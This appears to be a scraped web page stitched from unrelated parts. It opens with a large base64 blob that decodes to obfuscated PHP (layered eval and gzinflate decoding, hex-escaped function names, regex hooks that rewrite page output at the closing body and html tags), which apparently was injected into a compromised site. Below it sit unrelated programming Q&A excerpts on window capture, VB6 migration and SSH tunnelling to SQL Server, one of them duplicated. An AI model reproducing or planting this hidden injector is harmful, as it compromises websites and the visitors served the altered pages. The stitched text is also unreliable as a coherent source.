VjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2YTF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0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?>

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  • Can I get a bitmap of an arbitrary window in another application process?

    - by Chris Farmer
    I am trying to automate a third-party Win32 application where I want to capture the graphics content of a particular window at defined time intervals. I am in the early phases of this, and I'm currently trying to use the Microsoft UI Automation API via C# to do most of the interaction between my client app and the external app. I can now get the external app to do what I want it to do, but now I want to capture the graphics from a specific window that seems to be some third-party owner-drawn control. How can I do this? The window I want to capture is the one marked by the red rectangle in this image: I have an implementation that sort of works, but it's dependent on the external app's UI being on top, and that's not guaranteed for me, so I'd prefer to find something more general. var p = Process.Start("c:\myapp.exe"); var mainForm = AutomationElement.FromHandle(p.MainWindowHandle); // "workspace" below is the window whose content I want to capture. var workspace = mainForm.FindFirst(TreeScope.Descendents, new PropertyCondition(AutomationElement.ClassNameProperty, "AfxFrameOrView70u")); var rect = (Rect) workspace.GetCurrentPropertyValue(AutomationElement.BoundingRectangleProperty); using (var bmp = new Bitmap((int)rect.Width, (int)rect.Height)) { using (var g = Graphics.FromImage(bmp)) { g.CopyFromScreen((int)rect.Left, (int)rect.Top, 0, 0, new Size((int)rect.Width, (int)rect.Height)); bmp.Save(@"c:\screenshot.png", ImageFormat.Png); } } The above works well enough when the automated app is on top, but it just blindly copies the screen in the rectangle, so my code is at the mercy of whatever happens to be running on the machine and might cover my app's window. I have read some suggestions to send the WM_PRINT message to the window. This question/answer from a few months back seemed promising, but when I use this code, I just get a white rectangle with none of my control's actual contents. var prop = (int)workspace.GetCurrentPropertyValue(AutomationElement.NativeWindowHandleProperty); var hwnd = new IntPtr(prop); using ( var bmp2 = new Bitmap((int)rect.Width, (int)rect.Height)) { using (Graphics g = Graphics.FromImage(bmp2)) { g.FillRectangle(SystemBrushes.Control, 0, 0, (int)rect.Width, (int)rect.Height); try { SendMessage(hwnd, WM_PRINT, g.GetHdc().ToInt32(), (int)(DrawingOptions.PRF_CHILDREN | DrawingOptions.PRF_CLIENT | DrawingOptions.PRF_OWNED)); } finally { g.ReleaseHdc(); } bmp2.Save(@"c:\screenshot.bmp"); } } So, first, is it even possible for me to reliably save a bitmap of a window's contents? If so, what is the best way, and what is wrong with my WM_PRINT with SendMessage attempt?

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  • Which MS technologies would be suited for a data intensive application?

    - by steve.tse
    I'm a junior VB.net developer with little application design knowledge. I've been reading a lot of material online regarding different design patterns, frameworks, and methodologies. It's become a bit confusing for me. Right now I'm trying to decide on what language would be best suited to convert an existing VB6 application (with SQL server backend.) I need to update the UI and add more user functionality and reporting capabilities. Initially I was thinking of using WPF and attempting the MVVM model for this big project. Reports would be generated from SSRS. A peer suggested using ASP.net and I don't have enough experience to determine what would be better. The senior programmers here are stuck on using VB6 and don't have any input on what to use. They are encouraging me to use the latest technologies. This application would be for ~20 users in a central location. Ideally I would stick to a Microsoft .net language. Current interface is similar to a datagrid table where the user would click in to see the detail of each record. They would need to have multiple records open at any given time. I look forward to all the advice I can get. EDIT 2010/04/22 2:47 PM EST What is your audience? Internal clients within an intranet How complex are the interactions you expect to implement? not very... displaying data from SQL server to UI. Allow user updates to said data. Typically just one user modifying a record. Do you require near real-time data updates? no How often do you expect to update the application after the first release? twice/year Do you expect a well-defined set of client platforms? Yes, windows xp environment, potentially upgrading to Win7. Currently in IE.6 moving to IE7 or 8 within a couple of months. Do users need access from anywhere? No, just from their PC.

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  • Why can't I connect to remote Microsoft SQL Server through SSH tunnel?

    - by Alexander
    I have at home a D-Link DIR-615 C1 router with DD-WRT. I set up the SSH server on the router, and log on through an SSH2-RSA passphrase-protected key. That router is the gateway between the local network and the internet. One of the computers on that network has Microsoft SQL Server 2008 installed, with TCP/IP protocol enabled through port 1433. I've set up port forwarding on the router, so that remote connections are possible and are, in fact, working (some developers log on remotely without problems). I am part of another network, that has internet access through a proxy server, which only has ports 80 and 443 opened. I can't connect to that MSSQL server on that remote server because 1433 port is closed on this network. I connected (using Putty) through 443 port to my router's SSH server, and set up 2 tunnels. One is for RDP (3389), and it's working. The other is for 1433 port, to connect to the server. I can't connect through the SSH tunnel to the MS SQL Server, neither through telnet, or through GUI clients. Am I missing something? Additional details: on connect, I get this error from SQL Server Management Studio: TITLE: Connect to Server Cannot connect to localhost:14330. ADDITIONAL INFORMATION: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (Microsoft SQL Server, Error: 3) For help, click: http://go.microsoft.com/fwlink?ProdName=Microsoft+SQL+Server&EvtSrc=MSSQLServer&EvtID=3&LinkId=20476 BUTTONS: OK The tunnel is configured like this: L14330 192.168.0.103:1433 192.168.0.103 is the permanent address of the SQL Server on the LAN. I also successfully forwarded TCP traffic of 3389 port to that IP, so tunneling is working to that IP address. When connecting without tunnel, through Microsoft SQL Server Management Studio, using the same method the connection establishes. Too bad my proxy doesn't allow 1433 port traffic, I wouldn't have this headache.

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  • Why can't I connect to remote Microsoft SQL Server through SSH tunnel?

    - by Alexander
    I have at home a D-Link DIR-615 C1 router with DD-WRT. I set up the SSH server on the router, and log on through an SSH2-RSA passphrase-protected key. That router is the gateway between the local network and the internet. One of the computers on that network has Microsoft SQL Server 2008 installed, with TCP/IP protocol enabled through port 1433. I've set up port forwarding on the router, so that remote connections are possible and are, in fact, working (some developers log on remotely without problems). I am part of another network, that has internet access through a proxy server, which only has ports 80 and 443 opened. I can't connect to that MSSQL server on that remote server because 1433 port is closed on this network. I connected (using Putty) through 443 port to my router's SSH server, and set up 2 tunnels. One is for RDP (3389), and it's working. The other is for 1433 port, to connect to the server. I can't connect through the SSH tunnel to the MS SQL Server, neither through telnet, or through GUI clients. Am I missing something? Additional details: on connect, I get this error from SQL Server Management Studio: TITLE: Connect to Server Cannot connect to localhost:14330. ADDITIONAL INFORMATION: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (Microsoft SQL Server, Error: 3) For help, click: http://go.microsoft.com/fwlink?ProdName=Microsoft+SQL+Server&EvtSrc=MSSQLServer&EvtID=3&LinkId=20476 BUTTONS: OK The tunnel is configured like this: L14330 192.168.0.103:1433 192.168.0.103 is the permanent address of the SQL Server on the LAN. I also successfully forwarded TCP traffic of 3389 port to that IP, so tunneling is working to that IP address. When connecting without tunnel, through Microsoft SQL Server Management Studio, using the same method the connection establishes. Too bad my proxy doesn't allow 1433 port traffic, I wouldn't have this headache.

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